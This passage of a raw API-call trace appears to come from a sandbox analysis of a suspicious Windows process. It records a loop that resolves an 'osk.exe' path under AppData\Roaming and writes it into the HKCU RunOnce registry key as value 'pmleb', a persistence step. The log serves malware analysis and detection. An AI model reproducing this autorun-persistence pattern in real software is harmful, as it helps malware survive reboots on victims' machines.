[4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.320] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.320] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.320] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.320] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.321] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4 [0077.321] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.321] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x5 [0077.321] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, 
pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.321] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4 [0077.322] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.322] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.322] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.322] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.322] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.322] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.322] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.322] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.322] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.322] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.323] RegCloseKey (hKey=0x280) returned 0x0 [0077.323] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.323] GetCurrentThreadId () returned 0x544 [0077.323] GetCurrentThreadId () returned 0x544 [0077.323] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.323] SetTimer (hWnd=0x20280, nIDEvent=0x2004, uElapse=0xa, lpTimerFunc=0x0) returned 0x2004 [0077.323] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.335] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.335] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.335] KillTimer (hWnd=0x20280, uIDEvent=0x2004) returned 1 [0077.335] ISystemDebugEventFire:IsActive 
(This=0x7b4480) returned 0x1 [0077.335] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.335] IUnknown:Release (This=0x787518) returned 0x1 [0077.335] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.336] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.336] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.413] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.413] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, 
[4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.413] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.413] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.413] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.413] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.413] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5 [0077.413] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.413] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6 [0077.413] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, 
pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.414] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5 [0077.414] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.414] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.414] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.414] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.414] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.414] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.415] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.415] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.415] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.415] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.415] RegCloseKey (hKey=0x280) returned 0x0 [0077.415] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.415] GetCurrentThreadId () returned 0x544 [0077.415] GetCurrentThreadId () returned 0x544 [0077.416] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.416] SetTimer (hWnd=0x20280, nIDEvent=0x2005, uElapse=0xa, lpTimerFunc=0x0) returned 0x2005 [0077.416] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.416] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.416] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.416] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) 
returned 1 [0077.416] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.416] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.416] GetWindowLongW (hWnd=0x302a0, nIndex=-21) returned 7950016 [0077.416] KillTimer (hWnd=0x302a0, uIDEvent=0x1008) returned 1 [0077.416] GetCurrentThreadId () returned 0x544 [0077.417] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.428] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.428] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.428] KillTimer (hWnd=0x20280, uIDEvent=0x2005) returned 1 [0077.429] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.429] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.429] IUnknown:Release (This=0x787518) returned 0x1 [0077.429] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.429] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.429] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", 
varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.429] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.430] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.430] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.430] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.430] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.430] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.430] FileSystemObject:IUnknown:Release (This=0x2b53cec) 
returned 0x6 [0077.430] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.430] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x7 [0077.430] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.431] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6 [0077.431] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.431] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.431] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.431] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.431] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.431] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.431] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.431] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.432] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.432] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.432] RegCloseKey (hKey=0x280) returned 0x0 [0077.432] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.432] GetCurrentThreadId () 
returned 0x544 [0077.432] GetCurrentThreadId () returned 0x544 [0077.432] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.432] SetTimer (hWnd=0x20280, nIDEvent=0x2006, uElapse=0xa, lpTimerFunc=0x0) returned 0x2006 [0077.432] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.444] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.444] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.444] KillTimer (hWnd=0x20280, uIDEvent=0x2006) returned 1 [0077.444] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.444] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.444] IUnknown:Release (This=0x787518) returned 0x1 [0077.445] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.445] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 